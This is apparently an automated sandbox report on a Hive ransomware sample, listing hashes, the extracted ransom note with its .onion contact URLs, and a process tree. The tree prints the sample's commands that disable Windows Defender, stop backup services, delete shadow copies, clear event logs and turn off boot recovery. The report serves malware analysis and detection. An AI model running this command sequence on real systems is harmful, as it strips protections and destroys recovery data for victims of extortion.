Analysis

  • max time kernel
    131s
  • max time network
    49s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    10-10-2022 19:52

General

  • Target

    0e4d44dde522c07d09d9e3086cfae803.exe

  • Size

    3.9MB

  • MD5

    0e4d44dde522c07d09d9e3086cfae803

  • SHA1

    d8dc26e2094869a0da78ecb47494c931419302dc

  • SHA256

    33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277

  • SHA512

    ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06

  • SSDEEP

    49152:e2NiZPNNirb/T2vO90dL3BmAFd4A64nsfJk0NuXCdmTQb0/6VCrrPrsbg11VgWA2:e2ANB04yIa0hsirubO

Malware Config

Extracted

Path

C:\Program Files\7-Zip\n8pw_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note
Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: fTP4dtHQ51ZX Password: 7zC1gVatfxGNUwxnLe4e To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.cv2gj files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.
URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Hive

    A ransomware written in Golang first seen in June 2021.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs 3 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0e4d44dde522c07d09d9e3086cfae803.exe
    "C:\Users\Admin\AppData\Local\Temp\0e4d44dde522c07d09d9e3086cfae803.exe"
    1⤵
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1800
    • C:\Windows\system32\net.exe
      net.exe stop "NetMsmqActivator" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1108
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "NetMsmqActivator" /y
        3⤵
          PID:960
      • C:\Windows\system32\net.exe
        net.exe stop "SamSs" /y
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:948
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop "SamSs" /y
          3⤵
            PID:1736
        • C:\Windows\system32\net.exe
          net.exe stop "SDRSVC" /y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1252
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop "SDRSVC" /y
            3⤵
              PID:1728
          • C:\Windows\system32\net.exe
            net.exe stop "SstpSvc" /y
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1528
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop "SstpSvc" /y
              3⤵
                PID:608
            • C:\Windows\system32\net.exe
              net.exe stop "UI0Detect" /y
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1100
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 stop "UI0Detect" /y
                3⤵
                  PID:1232
              • C:\Windows\system32\net.exe
                net.exe stop "VSS" /y
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:684
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop "VSS" /y
                  3⤵
                    PID:1200
                • C:\Windows\system32\net.exe
                  net.exe stop "wbengine" /y
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:304
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 stop "wbengine" /y
                    3⤵
                      PID:1564
                  • C:\Windows\system32\net.exe
                    net.exe stop "WebClient" /y
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1720
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop "WebClient" /y
                      3⤵
                        PID:292
                    • C:\Windows\system32\sc.exe
                      sc.exe config "NetMsmqActivator" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:1872
                    • C:\Windows\system32\sc.exe
                      sc.exe config "SamSs" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:1280
                    • C:\Windows\system32\sc.exe
                      sc.exe config "SDRSVC" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:268
                    • C:\Windows\system32\sc.exe
                      sc.exe config "SstpSvc" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:1400
                    • C:\Windows\system32\sc.exe
                      sc.exe config "UI0Detect" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:1600
                    • C:\Windows\system32\sc.exe
                      sc.exe config "VSS" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:1716
                    • C:\Windows\system32\sc.exe
                      sc.exe config "wbengine" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:888
                    • C:\Windows\system32\sc.exe
                      sc.exe config "WebClient" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:1656
                    • C:\Windows\system32\reg.exe
                      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                      2⤵
                        PID:556
                      • C:\Windows\system32\reg.exe
                        reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                        2⤵
                          PID:1076
                        • C:\Windows\system32\reg.exe
                          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                          2⤵
                            PID:1732
                          • C:\Windows\system32\reg.exe
                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                            2⤵
                              PID:1956
                            • C:\Windows\system32\reg.exe
                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                              2⤵
                                PID:1616
                              • C:\Windows\system32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                2⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:1704
                              • C:\Windows\system32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                2⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:1552
                              • C:\Windows\system32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                2⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:608
                              • C:\Windows\system32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                2⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:284
                              • C:\Windows\system32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                2⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:672
                              • C:\Windows\system32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                2⤵
                                  PID:1116
                                • C:\Windows\system32\reg.exe
                                  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                  2⤵
                                    PID:1692
                                  • C:\Windows\system32\reg.exe
                                    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                    2⤵
                                      PID:1064
                                    • C:\Windows\system32\reg.exe
                                      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                      2⤵
                                        PID:2020
                                      • C:\Windows\system32\reg.exe
                                        reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                        2⤵
                                          PID:1008
                                        • C:\Windows\system32\reg.exe
                                          reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                          2⤵
                                            PID:804
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                            2⤵
                                              PID:1740
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                              2⤵
                                                PID:576
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                2⤵
                                                  PID:1776
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                  2⤵
                                                    PID:1664
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                    2⤵
                                                      PID:1984
                                                    • C:\Windows\system32\reg.exe
                                                      reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                      2⤵
                                                        PID:1736
                                                      • C:\Windows\system32\reg.exe
                                                        reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                        2⤵
                                                          PID:856
                                                        • C:\Windows\system32\reg.exe
                                                          reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                          2⤵
                                                            PID:1412
                                                          • C:\Windows\system32\reg.exe
                                                            reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                            2⤵
                                                              PID:1660
                                                            • C:\Windows\system32\reg.exe
                                                              reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                              2⤵
                                                                PID:524
                                                              • C:\Windows\system32\reg.exe
                                                                reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                2⤵
                                                                  PID:1176
                                                                • C:\Windows\system32\reg.exe
                                                                  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                  2⤵
                                                                    PID:1336
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                    2⤵
                                                                      PID:580
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                      2⤵
                                                                        PID:1964
                                                                      • C:\Windows\system32\reg.exe
                                                                        reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                        2⤵
                                                                          PID:2000
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                          2⤵
                                                                          • Modifies security service
                                                                          PID:1152
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                          2⤵
                                                                            PID:1596
                                                                          • C:\Windows\system32\vssadmin.exe
                                                                            vssadmin.exe delete shadows /all /quiet
                                                                            2⤵
                                                                            • Interacts with shadow copies
                                                                            PID:1520
                                                                          • C:\Windows\system32\wevtutil.exe
                                                                            wevtutil.exe cl system
                                                                            2⤵
                                                                            • Clears Windows event logs
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:776
                                                                          • C:\Windows\system32\wevtutil.exe
                                                                            wevtutil.exe cl security
                                                                            2⤵
                                                                            • Clears Windows event logs
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1120
                                                                          • C:\Windows\system32\wevtutil.exe
                                                                            wevtutil.exe cl application
                                                                            2⤵
                                                                            • Clears Windows event logs
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1204
                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                            wmic.exe SHADOWCOPY /nointeractive
                                                                            2⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1284
                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                            wmic.exe shadowcopy delete
                                                                            2⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1644
                                                                          • C:\Windows\system32\bcdedit.exe
                                                                            bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                            2⤵
                                                                            • Modifies boot configuration data using bcdedit
                                                                            PID:952
                                                                          • C:\Windows\system32\bcdedit.exe
                                                                            bcdedit.exe /set {default} recoveryenabled no
                                                                            2⤵
                                                                            • Modifies boot configuration data using bcdedit
                                                                            PID:1364
                                                                          • C:\Windows\system32\cmd.exe
                                                                            cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                            2⤵
                                                                              PID:968
                                                                              • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                3⤵
                                                                                • Deletes Windows Defender Definitions
                                                                                PID:1212
                                                                            • C:\Windows\system32\cmd.exe
                                                                              cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
                                                                              2⤵
                                                                                PID:1760
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                  3⤵
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:1832
                                                                              • C:\Windows\system32\cmd.exe
                                                                                cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                2⤵
                                                                                  PID:1212
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                    3⤵
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:1816
                                                                                • C:\Windows\system32\notepad.exe
                                                                                  notepad.exe C:\n8pw_HOW_TO_DECRYPT.txt
                                                                                  2⤵
                                                                                  • Opens file in notepad (likely ransom note)
                                                                                  PID:2256
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\0e4d44dde522c07d09d9e3086cfae803.exe"
                                                                                  2⤵
                                                                                    PID:2264
                                                                                    • C:\Windows\system32\PING.EXE
                                                                                      ping.exe -n 5 127.0.0.1
                                                                                      3⤵
                                                                                      • Runs ping.exe
                                                                                      PID:2288

                                                                                Network

                                                                                MITRE ATT&CK Enterprise v6

                                                                                Replay Monitor

                                                                                Loading Replay Monitor...

                                                                                Downloads

                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                  Filesize

                                                                                  7KB

                                                                                  MD5

                                                                                  4633abe45903b79e0f2a0801dbc51048

                                                                                  SHA1

                                                                                  bee33ffaf1cc70b160c58b52d1f9c51b6fbbf836

                                                                                  SHA256

                                                                                  7d0c8edbeb4d4f45ad1f1486a3ee0c615901f9cdc3f23898f572ad479dc10592

                                                                                  SHA512

                                                                                  9d9619b3d97833fa85d3bd881122d065f67b67b327c310c160bdc97be64919d23654d529c010ac69b0c33781865ba2e2613fcf0871ffbefe0438aa5fa422564e

                                                                                • C:\n8pw_HOW_TO_DECRYPT.txt

                                                                                  Filesize

                                                                                  1KB

                                                                                  MD5

                                                                                  d3eca3baec61c36c9353ef1699b8bfca

                                                                                  SHA1

                                                                                  f084193262e0d462165cfac58e1422ab90df7514

                                                                                  SHA256

                                                                                  3ef5776a2dfd960f996ab765efa2b117d3e3135dc8e196aa7bdc525bd4125678

                                                                                  SHA512

                                                                                  8d8eb00e0764ea07a999d0f07bd21f4f4b8169f19673de0cea833670c38edd41792136a63036477bebeb2a0fbbca5f4faafb381f8fd4ffb178d4209e073e2a17

                                                                                • memory/776-113-0x000007FEFBE11000-0x000007FEFBE13000-memory.dmp

                                                                                  Filesize

                                                                                  8KB

                                                                                • memory/1816-131-0x000007FEF38D0000-0x000007FEF442D000-memory.dmp

                                                                                  Filesize

                                                                                  11.4MB

                                                                                • memory/1816-130-0x000007FEF4430000-0x000007FEF4E53000-memory.dmp

                                                                                  Filesize

                                                                                  10.1MB

                                                                                • memory/1816-135-0x00000000025AB000-0x00000000025CA000-memory.dmp

                                                                                  Filesize

                                                                                  124KB

                                                                                • memory/1816-134-0x00000000025AB000-0x00000000025CA000-memory.dmp

                                                                                  Filesize

                                                                                  124KB

                                                                                • memory/1816-133-0x00000000025A4000-0x00000000025A7000-memory.dmp

                                                                                  Filesize

                                                                                  12KB

                                                                                • memory/1816-132-0x000000001B7B0000-0x000000001BAAF000-memory.dmp

                                                                                  Filesize

                                                                                  3.0MB

                                                                                • memory/1832-123-0x000007FEF2F30000-0x000007FEF3A8D000-memory.dmp

                                                                                  Filesize

                                                                                  11.4MB

                                                                                • memory/1832-125-0x000000001B790000-0x000000001BA8F000-memory.dmp

                                                                                  Filesize

                                                                                  3.0MB

                                                                                • memory/1832-126-0x00000000025E4000-0x00000000025E7000-memory.dmp

                                                                                  Filesize

                                                                                  12KB

                                                                                • memory/1832-127-0x00000000025EB000-0x000000000260A000-memory.dmp

                                                                                  Filesize

                                                                                  124KB

                                                                                • memory/1832-124-0x00000000025E4000-0x00000000025E7000-memory.dmp

                                                                                  Filesize

                                                                                  12KB

                                                                                • memory/1832-122-0x000007FEF3A90000-0x000007FEF44B3000-memory.dmp

                                                                                  Filesize

                                                                                  10.1MB